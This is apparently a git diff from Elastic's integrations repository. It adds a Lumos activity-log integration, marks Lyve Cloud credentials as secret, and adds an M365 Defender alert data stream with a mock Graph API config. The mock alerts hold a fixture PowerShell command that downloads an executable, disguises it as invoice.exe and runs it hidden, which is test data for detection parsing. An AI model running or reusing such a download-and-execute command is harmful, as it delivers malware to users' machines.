user\",\"email\":\"wile.e.coyote@lumos.com\",\"family_name\":\"Wile\",\"given_name\":\"Coyote\"},\"event_began_at\":\"2024-03-12T16:09:14\",\"event_hash\":\"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7\",\"event_metadata\":{},\"event_type\":\"SOD_POLICY_DELETED\",\"event_type_user_friendly\":\"A user deleted a SOD Policy\",\"outcome\":\"Succeeded\",\"targets\":[{\"name\":\"Untitled Rule\",\"target_type\":\"SOD Policy\"}]}" +} \ No newline at end of file diff --git a/packages/lumos/docs/README.md b/packages/lumos/docs/README.md new file mode 100644 index 00000000000..71a04477a00 --- /dev/null +++ b/packages/lumos/docs/README.md 
@@ -0,0 +1,136 @@ +# Lumos Integration + +The Lumos integration uses [Lumos' API](https://api.lumos.com/) to retrieve Activity Logs and ingest them into Elasticsearch. This allows you to search, observe, and visualize the Activity Logs through Elasticsearch. + +The Elastic agent running this integration interacts with Lumos' infrastructure using their APIs to retrieve [Activity Logs](https://api.lumos.com/activity_logs) for a Lumos tenant. + +## Configuration + +### Enabling the integration in Elastic + +1. In Kibana go to **Management > Integrations** +2. In the "Search for integrations" search bar type **Lumos**. +3. Click on "Lumos" integration from the search results. +4. Click on **Add Lumos** button to add Lumos integration. + +### Configure Lumos Activity Logs data stream + +1. In Lumos go to **Settings > API Tokens** +2. Click on "Add API Token", enter a name and description +3. Copy the key starting with `lsk_` +4. While adding Lumos integration in Elastic, paste your key into the `API Token` field + +## Logs + +### Activity Logs + +Activity Logs summarize the history of changes and events occurring within Lumos. + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. 
| keyword | +| event.action | The activity that occurred | keyword | +| event.created | The time the event began | date | +| event.id | The event hash | keyword | +| event.module | Event module | constant_keyword | +| event.outcome | The outcome of the event, whether it succeeded or failed | keyword | +| input.type | Input type | keyword | +| lumos.activity_logs.actor.actor_type | The type of actor | keyword | +| lumos.activity_logs.actor.email | The email of the actor | keyword | +| lumos.activity_logs.actor.family_name | The family name of the actor | keyword | +| lumos.activity_logs.actor.given_name | The given name of the actor | keyword | +| lumos.activity_logs.event_began_at | The time the event began | keyword | +| lumos.activity_logs.event_type_user_friendly | The user friendly type of the event | keyword | +| lumos.activity_logs.targets.name | | keyword | +| lumos.activity_logs.targets.target_type | | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. 
| match_only_text | + + +An example event for `activity` looks as following: + +```json +{ + "@timestamp": "2024-03-14T17:53:58.869Z", + "agent": { + "ephemeral_id": "9d0d6b51-1c05-4ab1-ab5c-c16e485d734f", + "id": "f57bb12d-cf67-4ec4-9ed0-52eeb865959e", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "lumos.activity_logs", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "f57bb12d-cf67-4ec4-9ed0-52eeb865959e", + "snapshot": false, + "version": "8.12.1" + }, + "event": { + "action": "SOD_POLICY_DELETED", + "agent_id_status": "verified", + "created": "2024-03-14T17:53:58.869Z", + "dataset": "lumos.activity_logs", + "id": "630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7", + "ingested": "2024-03-14T17:54:10Z", + "kind": "event", + "outcome": "success", + "type": "info" + }, + "host": { + "architecture": "aarch64", + "containerized": false, + "hostname": "docker-fleet-agent", + "id": "fb3be8e9409740ebb6621b777f0c397d", + "ip": [ + "192.168.144.7" + ], + "mac": [ + "02-42-C0-A8-90-07" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "6.6.12-linuxkit", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "input": { + "type": "httpjson" + }, + "lumos": { + "activity_logs": { + "actor": { + "actor_type": "Lumos user", + "email": "wile.e.coyote@lumos.com", + "family_name": "Wile", + "given_name": "Coyote" + }, + "event_began_at": "2024-03-12T16:09:14", + "event_type_user_friendly": "A user deleted a SOD Policy", + "targets": [ + { + "name": "Untitled Rule", + "target_type": "SOD Policy" + } + ] + } + }, + "message": "{\"actor\":{\"actor_type\":\"Lumos 
user\",\"email\":\"wile.e.coyote@lumos.com\",\"family_name\":\"Wile\",\"given_name\":\"Coyote\"},\"event_began_at\":\"2024-03-12T16:09:14\",\"event_hash\":\"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7\",\"event_metadata\":{},\"event_type\":\"SOD_POLICY_DELETED\",\"event_type_user_friendly\":\"A user deleted a SOD Policy\",\"outcome\":\"Succeeded\",\"targets\":[{\"name\":\"Untitled Rule\",\"target_type\":\"SOD Policy\"}]}" +} +``` \ No newline at end of file diff --git a/packages/lumos/img/activity-log-screenshot.png b/packages/lumos/img/activity-log-screenshot.png new file mode 100644 index 00000000000..bc266a997f9 Binary files /dev/null and b/packages/lumos/img/activity-log-screenshot.png differ diff --git a/packages/lumos/img/lumos-logo.svg b/packages/lumos/img/lumos-logo.svg new file mode 100644 index 00000000000..c30b5f3eb9c --- /dev/null +++ b/packages/lumos/img/lumos-logo.svg @@ -0,0 +1,16 @@ + + + + + + + + + + + + + + + + diff --git a/packages/lumos/img/lumos-screenshot.png b/packages/lumos/img/lumos-screenshot.png new file mode 100644 index 00000000000..425c1aa5b3a Binary files /dev/null and b/packages/lumos/img/lumos-screenshot.png differ diff --git a/packages/lumos/manifest.yml b/packages/lumos/manifest.yml new file mode 100644 index 00000000000..f8e0cfed1d0 --- /dev/null +++ b/packages/lumos/manifest.yml 
@@ -0,0 +1,55 @@
+format_version: 3.1.2
+name: lumos
+title: "Lumos"
+version: 0.1.0
+description: "An integration with Lumos to ship your Activity logs to your Elastic instance."
+type: integration
+categories:
+ - security
+conditions:
+ kibana:
+ version: "^8.12.1"
+ elastic:
+ subscription: "basic"
+screenshots:
+ - src: /img/lumos-screenshot.png
+ title: Lumos screenshot
+ size: 600x600
+ type: image/png
+ - src: /img/activity-log-screenshot.png
+ title: Activity Log screenshot
+ size: 1496x433
+ type: image/png
+icons:
+ - src: /img/lumos-logo.svg
+ title: Lumos logo
+ size: 32x32
+ type: image/svg+xml
+policy_templates:
+ - name: lumos
+ title: Lumos Activity Logs
+ description: Collect Activity Logs from Lumos
+ inputs:
+ - type: httpjson
+ title: "Collect Activity Logs via API"
+ description: "Collecting Activity Logs from Slack via API"
+ vars:
+ - name: api_url
+ type: text
+ title: API URL.
+ description: The root URL for the API endpoints
+ multi: false
+ required: true
+ show_user: false
+ default: https://api.lumos.com
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: false
+ show_user: true
+ default: 60s
+owner:
+ github: elastic/security-service-integrations
+ type: partner
diff --git a/packages/lyve_cloud/changelog.yml b/packages/lyve_cloud/changelog.yml
index f28cb274dd8..272e7d0bfb4 100644
--- a/packages/lyve_cloud/changelog.yml
+++ b/packages/lyve_cloud/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.13.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9127
 - version: "1.12.1"
 changes:
 - description: Changed owners
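Review bot: The `httpjson` input's user-facing text reads `description: "Collecting Activity Logs from Slack via API"`, a copy-paste leftover from another package that Fleet will display verbatim; it should read `description: "Collecting Activity Logs from Lumos via API"`. The same lineage shows in the Slack-style `xoxp-1234567890` token used by the mock config and the system-test config earlier on this page, whereas the README on this page says Lumos keys start with `lsk_`; an `lsk_`-prefixed placeholder would make the fixtures self-consistent. `title: API URL.` also carries a stray trailing period.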
diff --git a/packages/lyve_cloud/data_stream/audit/manifest.yml b/packages/lyve_cloud/data_stream/audit/manifest.yml
index 936667867ff..5cb4cad1eb8 100644
--- a/packages/lyve_cloud/data_stream/audit/manifest.yml
+++ b/packages/lyve_cloud/data_stream/audit/manifest.yml
@@ -47,12 +47,14 @@ streams:
 multi: false
 required: true
 show_user: true
+ secret: true
 - name: secret_access_key
 type: password
 title: Secret Access Key
 multi: false
 required: true
 show_user: true
+ secret: true
 - name: endpoint
 type: text
 title: Endpoint
diff --git a/packages/lyve_cloud/manifest.yml b/packages/lyve_cloud/manifest.yml
index f08ffa0a34a..1796b2f6000 100644
--- a/packages/lyve_cloud/manifest.yml
+++ b/packages/lyve_cloud/manifest.yml
@@ -1,14 +1,14 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: lyve_cloud
 title: Lyve Cloud
-version: "1.12.1"
+version: "1.13.0"
 description: Collect S3 API audit log from Lyve Cloud with Elastic Agent.
 type: integration
 categories:
 - security
 conditions:
 kibana:
- version: "^8.5.0"
+ version: "^8.12.0"
 icons:
 - src: /img/LyveCloud-Logo.svg
 title: Seagate-Lyve-Cloud
diff --git a/packages/m365_defender/_dev/build/build.yml b/packages/m365_defender/_dev/build/build.yml
index 2bfcfc223b0..71f48ba2a9c 100644
--- a/packages/m365_defender/_dev/build/build.yml
+++ b/packages/m365_defender/_dev/build/build.yml
@@ -1,3 +1,4 @@
 dependencies:
 ecs:
 reference: "git@v8.11.0"
+ import_mappings: true
diff --git a/packages/m365_defender/_dev/build/docs/README.md b/packages/m365_defender/_dev/build/docs/README.md
index c2925b1e992..6848244a124 100644
--- a/packages/m365_defender/_dev/build/docs/README.md
+++ b/packages/m365_defender/_dev/build/docs/README.md
@@ -2,7 +2,7 @@ ## Overview -The [Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender) integration allows you to monitor Incident (Microsoft Graph Security API) and Event (Streaming API) Logs. Microsoft 365 Defender is a unified pre and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks. +The [Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender) integration allows you to monitor Alert, Incident (Microsoft Graph Security API) and Event (Streaming API) Logs. Microsoft 365 Defender is a unified pre and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks. Use the Microsoft 365 Defender integration to collect and parse data from the Microsoft Azure Event Hub, Microsoft Graph Security v1.0 REST API and Microsoft 365 Defender API. Then visualise that data in Kibana. 
@@ -10,7 +10,9 @@ For example, you could use the data from this integration to consolidate and cor ## Data streams -The Microsoft 365 Defender integration collects logs for three types of events: Event, Incident and Log. +The Microsoft 365 Defender integration collects logs for four types of events: Alert, Event, Incident and Log. + +**Alert:** This data streams leverages the [M365 Defender Streaming API](https://learn.microsoft.com/en-us/graph/api/resources/security-alert?view=graph-rest-1.0) to collect alerts including suspicious activities in a customer's tenant that Microsoft or partner security providers have identified and flagged for action. **Event (Recommended):** This data streams leverages the [M365 Defender Streaming API](https://learn.microsoft.com/en-us/microsoft-365/security/defender/streaming-api?view=o365-worldwide) to collect Alert, Device, Email, App and Identity Events. Events are streamed to an Azure Event Hub. For a list of Supported Events exposed by the Streaming API and supported by Elastic's integration, please see Microsoft's documentation [here](https://learn.microsoft.com/en-us/microsoft-365/security/defender/supported-event-types?view=o365-worldwide). @@ -73,6 +75,16 @@ For **Event**, in filebeat [Azure Event Hub](https://www.elastic.co/guide/en/bea ## Logs reference +### alert + +This is the `alert` dataset. + +#### Example + +{{event "alert"}} + +{{fields "alert"}} + ### event This is the `event` dataset. diff --git a/packages/m365_defender/_dev/deploy/docker/alert-http-mock-config.yml b/packages/m365_defender/_dev/deploy/docker/alert-http-mock-config.yml new file mode 100644 index 00000000000..cc4310826ea --- /dev/null +++ b/packages/m365_defender/_dev/deploy/docker/alert-http-mock-config.yml 
@@ -0,0 +1,569 @@ +rules: + - path: /tenant_id/oauth2/v2.0/token + methods: [POST] + query_params: + grant_type: client_credentials + request_headers: + Content-Type: + - "application/x-www-form-urlencoded" + responses: + - status_code: 200 + headers: + Content-Type: + - "application/json" + body: |- + {"access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN","token_type": "Bearer","not_before": 1549647431,"expires_in": 3600} + - path: /v1.0/security/alerts_v2 + methods: [GET] + query_params: + $skip: 0 + $top: 2 + request_headers: + Authorization: + - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" + responses: + - status_code: 200 + headers: + Content-Type: + - "application/json" + body: |- + { + "value": [ + { + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "providerAlertId": "efa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "incidentId": "23", + "status": "new", + "severity": "medium", + "classification": null, + "determination": null, + "serviceSource": "microsoftDefenderForEndpoint", + "detectionSource": "microsoftDefenderForEndpoint", + "productName": "Microsoft Defender for Endpoint", + "detectorId": "7f1c3609-a3ff-40e2-995b-c01770161d68", + "tenantId": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "Suspicious PowerShell command line", + "description": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "recommendedActions": "1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\n2. 
Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.", + "category": "Execution", + "assignedTo": null, + "alertWebUrl": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "incidentWebUrl": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "actorDisplayName": null, + "threatDisplayName": null, + "threatFamilyName": null, + "mitreTechniques": [ + "T1059.001" + ], + "createdDateTime": "2023-10-20T09:53:09.8839373Z", + "lastUpdateDateTime": "2023-10-20T09:54:07.5033333Z", + "resolvedDateTime": null, + "firstActivityDateTime": "2023-10-20T09:51:39.5154802Z", + "lastActivityDateTime": "2023-10-20T09:51:41.9939003Z", + "alertPolicyId": null, + "additionalData": null, + "comments": [], + "evidence": [ + { + "@odata.type": "#microsoft.graph.security.deviceEvidence", + "createdDateTime": "2023-10-20T09:53:10.1933333Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [ + "PrimaryDevice" + ], + "tags": [], + "firstSeenDateTime": "2023-10-20T09:50:17.7383987Z", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "azureAdDeviceId": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "deviceDnsName": "clw555test", + "osPlatform": "Windows11", + "osBuild": 22621, + "version": "22H2", + "healthStatus": "inactive", + "riskScore": "high", + "rbacGroupId": 0, + "rbacGroupName": null, + "onboardingStatus": "onboarded", + "defenderAvStatus": "notSupported", + "ipInterfaces": [ + "192.168.5.65", + "fe80::cfe4:80b:615c:38fb", + 
"127.0.0.1", + "::1" + ], + "vmMetadata": null, + "loggedOnUsers": [ + { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD" + } + ] + }, + { + "@odata.type": "#microsoft.graph.security.userEvidence", + "createdDateTime": "2023-10-20T09:53:10.1933333Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": null, + "userPrincipalName": null, + "displayName": null + } + }, + { + "@odata.type": "#microsoft.graph.security.urlEvidence", + "createdDateTime": "2023-10-20T09:53:10.1933333Z", + "verdict": "suspicious", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "url": "http://127.0.0.1/1.exe" + }, + { + "@odata.type": "#microsoft.graph.security.ipEvidence", + "createdDateTime": "2023-10-20T09:53:10.1933333Z", + "verdict": "suspicious", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "ipAddress": "127.0.0.1", + "countryLetterCode": null + }, + { + "@odata.type": "#microsoft.graph.security.processEvidence", + "createdDateTime": "2023-10-20T09:53:10.1933333Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "processId": 8224, + "parentProcessId": 5772, + "processCommandLine": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "processCreationDateTime": "2023-10-20T09:51:39.4997961Z", + "parentProcessCreationDateTime": 
"2023-10-20T09:51:19.5064237Z", + "detectionStatus": "detected", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "imageFile": { + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "fileName": "powershell.exe", + "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "fileSize": 491520, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "parentProcessImageFile": { + "sha1": null, + "sha256": null, + "fileName": "cmd.exe", + "filePath": "C:\\Windows\\System32", + "fileSize": 323584, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": null, + "userPrincipalName": null, + "displayName": null + } + } + ] + }, + { + "id": "da2046fc02-67f1-41f5-923d-ef916d70c005_1", + "providerAlertId": "2046fc02-67f1-41f5-923d-ef916d70c005_1", + "incidentId": "23", + "status": "new", + "severity": "informational", + "classification": null, + "determination": null, + "serviceSource": "microsoftDefenderForEndpoint", + "detectionSource": "microsoftDefenderForEndpoint", + "productName": "Microsoft Defender for Endpoint", + "detectorId": "de54c08f-c3f5-40e3-ae58-7e3fffbc2574", + "tenantId": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "[Test Alert] Suspicious Powershell commandline", + "description": " This is a test alert \nA suspicious Powershell commandline was found on the machine. This commandline might be used during installation, exploration, or in some cases with lateral movement activities which are used by attackers to invoke modules, download external payloads, and get more information about the system. 
Attackers usually use Powershell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "recommendedActions": " This is a test alert \n1. Examine the PowerShell commandline to understand what commands were executed. Note: the script may need to be decoded if it is base64-encoded\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert. \n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.", + "category": "Execution", + "assignedTo": null, + "alertWebUrl": "https://security.microsoft.com/alerts/da2046fc02-67f1-41f5-923d-ef916d70c005_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "incidentWebUrl": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "actorDisplayName": null, + "threatDisplayName": null, + "threatFamilyName": null, + "mitreTechniques": [ + "T1059.001" + ], + "createdDateTime": "2023-10-20T09:54:06.750499Z", + "lastUpdateDateTime": "2023-10-20T09:54:10.4666667Z", + "resolvedDateTime": null, + "firstActivityDateTime": "2023-10-20T09:51:39.5154802Z", + "lastActivityDateTime": "2023-10-20T09:51:39.5154802Z", + "alertPolicyId": null, + "additionalData": null, + "comments": [], + "evidence": [ + { + "@odata.type": "#microsoft.graph.security.deviceEvidence", + "createdDateTime": "2023-10-20T09:54:06.84Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [ + "PrimaryDevice" + ], + "tags": [], + "firstSeenDateTime": "2023-10-20T09:50:17.7383987Z", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "azureAdDeviceId": 
"f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "deviceDnsName": "clw555test", + "osPlatform": "Windows11", + "osBuild": 22621, + "version": "22H2", + "healthStatus": "inactive", + "riskScore": "high", + "rbacGroupId": 0, + "rbacGroupName": null, + "onboardingStatus": "onboarded", + "defenderAvStatus": "notSupported", + "ipInterfaces": [ + "192.168.5.65", + "fe80::cfe4:80b:615c:38fb", + "127.0.0.1", + "::1" + ], + "vmMetadata": null, + "loggedOnUsers": [] + }, + { + "@odata.type": "#microsoft.graph.security.userEvidence", + "createdDateTime": "2023-10-20T09:54:06.84Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + }, + { + "@odata.type": "#microsoft.graph.security.processEvidence", + "createdDateTime": "2023-10-20T09:54:06.84Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "processId": 5772, + "parentProcessId": 7408, + "processCommandLine": "\"cmd.exe\" ", + "processCreationDateTime": "2023-10-20T09:51:19.5064237Z", + "parentProcessCreationDateTime": "2023-10-20T09:34:32.0067951Z", + "detectionStatus": "detected", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "imageFile": { + "sha1": "13e9bb7e85ff9b08c26a440412e5cd5d296c4d35", + "sha256": "423e0e810a69aaceba0e5670e58aff898cf0ebffab99ccb46ebb3464c3d2facb", + "fileName": "cmd.exe", + "filePath": "C:\\Windows\\System32", + "fileSize": 323584, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "parentProcessImageFile": { + "sha1": null, + "sha256": null, + "fileName": "explorer.exe", + 
"filePath": "C:\\Windows", + "fileSize": 5261576, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + }, + { + "@odata.type": "#microsoft.graph.security.processEvidence", + "createdDateTime": "2023-10-20T09:54:06.84Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "processId": 8224, + "parentProcessId": 5772, + "processCommandLine": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "processCreationDateTime": "2023-10-20T09:51:39.4997961Z", + "parentProcessCreationDateTime": "2023-10-20T09:51:19.5064237Z", + "detectionStatus": "detected", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "imageFile": { + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "fileName": "powershell.exe", + "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "fileSize": 491520, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "parentProcessImageFile": { + "sha1": null, + "sha256": null, + "fileName": "cmd.exe", + "filePath": "C:\\Windows\\System32", + "fileSize": 323584, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + 
"azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + } + ] + } + ] + } + - path: /v1.0/security/alerts_v2 + methods: [GET] + query_params: + $skip: 2 + $top: 2 + request_headers: + Authorization: + - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" + responses: + - status_code: 200 + headers: + Content-Type: + - "application/json" + body: |- + { + "value": [ + { + "id": "dab4728eea-b128-44e3-ac16-a21f73b5436b_1", + "providerAlertId": "b4728eea-b128-44e3-ac16-a21f73b5436b_1", + "incidentId": "23", + "status": "new", + "severity": "low", + "classification": null, + "determination": null, + "serviceSource": "microsoftDefenderForEndpoint", + "detectionSource": "microsoftDefenderForEndpoint", + "productName": "Microsoft Defender for Endpoint", + "detectorId": "9bfe28a9-21eb-4f8a-b51e-38ebd3650c88", + "tenantId": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "Suspicious Process Discovery", + "description": "A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.", + "recommendedActions": "A. Validate the alert.\n1. Review the alert and inspect the tool that was used to gather information. Inspect the account that was used to launch the tool.\n2. Check the device timeline for other suspicious activities.\n3. Locate unfamiliar processes in the process tree. Check files for prevalence, their locations, and digital signatures.\n4. Submit relevant files for deep analysis and review file behaviors.\n5. Identify unusual system activity with system owners.\n\nB. Scope the incident. Find related devices in the incident graph. \n\nC. Contain and mitigate the breach. Stop suspicious scripts or processes, isolate affected devices, decommission compromised accounts or reset passwords, block IP addresses and URLs, and install security updates.\n\nD. 
Contact your incident response team or contact Microsoft support for investigation and remediation services.", + "category": "Discovery", + "assignedTo": null, + "alertWebUrl": "https://security.microsoft.com/alerts/dab4728eea-b128-44e3-ac16-a21f73b5436b_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "incidentWebUrl": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "actorDisplayName": null, + "threatDisplayName": null, + "threatFamilyName": null, + "mitreTechniques": [ + "T1057", + "T1059.001" + ], + "createdDateTime": "2023-10-20T09:54:10.8560905Z", + "lastUpdateDateTime": "2023-10-20T09:54:11.4966667Z", + "resolvedDateTime": null, + "firstActivityDateTime": "2023-10-20T09:51:39.5154802Z", + "lastActivityDateTime": "2023-10-20T09:51:41.6475257Z", + "alertPolicyId": null, + "additionalData": null, + "comments": [], + "evidence": [ + { + "@odata.type": "#microsoft.graph.security.deviceEvidence", + "createdDateTime": "2023-10-20T09:54:10.8833333Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [ + "PrimaryDevice" + ], + "tags": [], + "firstSeenDateTime": "2023-10-20T09:50:17.7383987Z", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "azureAdDeviceId": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "deviceDnsName": "clw555test", + "osPlatform": "Windows11", + "osBuild": 22621, + "version": "22H2", + "healthStatus": "inactive", + "riskScore": "high", + "rbacGroupId": 0, + "rbacGroupName": null, + "onboardingStatus": "onboarded", + "defenderAvStatus": "notSupported", + "ipInterfaces": [], + "vmMetadata": null, + "loggedOnUsers": [ + { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD" + } + ] + }, + { + "@odata.type": "#microsoft.graph.security.userEvidence", + "createdDateTime": "2023-10-20T09:54:10.8833333Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + 
